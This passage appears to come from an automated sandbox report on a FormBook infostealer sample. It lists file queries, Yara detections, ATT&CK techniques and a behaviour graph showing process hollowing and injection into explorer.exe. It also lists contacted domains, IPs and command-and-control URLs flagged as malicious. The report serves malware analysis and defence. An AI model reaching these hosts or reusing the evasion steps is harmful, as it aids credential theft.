            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook (the same Yara match sources as listed under Stealing of Sensitive Information)

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Network Configuration Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Network Connections Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | System Information Discovery112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 502374 | Sample: Fu94e0b1TR | Startdate: 13/10/2021 | Architecture: WINDOWS | Score: 100

            Start (node 2)
              DNS/IP: www.fis.photos; fis.photos; www.rjtherealest.com
              Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
              Started: Fu94e0b1TR.exe 6 (node 11)

            Fu94e0b1TR.exe (node 11)
              Signatures: Tries to detect virtualization through RDTSC time measurements
              Started: Fu94e0b1TR.exe (node 14); Fu94e0b1TR.exe (node 17)

            Fu94e0b1TR.exe (node 14)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              Injected: explorer.exe (node 19)

            explorer.exe (node 19)
              DNS/IP: www.shacksolid.com, 64.190.62.111, ports 49795 -> 80, NBS11696US, United States; fbc7888164e64afca05b80bb89630439.pacloudflare.com, 172.65.227.72, ports 49790 -> 80, CLOUDFLARENETUS, United States; 4 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
              Started: NETSTAT.EXE (node 23)

            NETSTAT.EXE (node 23)
              Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              Started: cmd.exe 1 (node 26)

            cmd.exe (node 26)
              Started: conhost.exe (node 28)

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            6.2.Fu94e0b1TR.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            fbc7888164e64afca05b80bb89630439.pacloudflare.com | 172.65.227.72 | true | true | | unknown
            www.rjtherealest.com | 74.208.236.145 | true | false | | unknown
            www.shacksolid.com | 64.190.62.111 | true | true | | unknown
            fis.photos | 192.0.78.24 | true | true | | unknown
            www.apricitee.com | unknown | unknown | true | | unknown
            www.fis.photos | unknown | unknown | true | | unknown
            www.instatechnovelz.com | unknown | unknown | true | | unknown
            www.brondairy.com | unknown | unknown | true | | unknown

                            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            www.fis.photos/ef6c/ | true | Avira URL Cloud: safe | low
            http://www.apricitee.com/ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC | true | Avira URL Cloud: safe | unknown
            http://www.shacksolid.com/ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D | true | Avira URL Cloud: safe | unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34INETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designersGFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                              high
                              http://www.galapagosdesign.com/staff/dennis.htmNormaldkFu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comI.TTFFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/?Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comditoFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designersKFu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.comalicuFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.founder.com.cn/cn/bTheFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/jp/DFu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers?Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comessedFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.goodfont.co.krFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designersivaFu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersPFu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.collada.org/2005/11/COLLADASchema9DoneFu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/cTheFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/7Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/chFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://fontfabrik.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/)Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/(Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fonts.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com7Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.urwpp.deFu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comDFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comR.TTFFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comtutaFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSFu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/kFu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers/%Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comFu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/ntFu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.comFFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlrFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp//lpkFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tiro.coma-eFu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
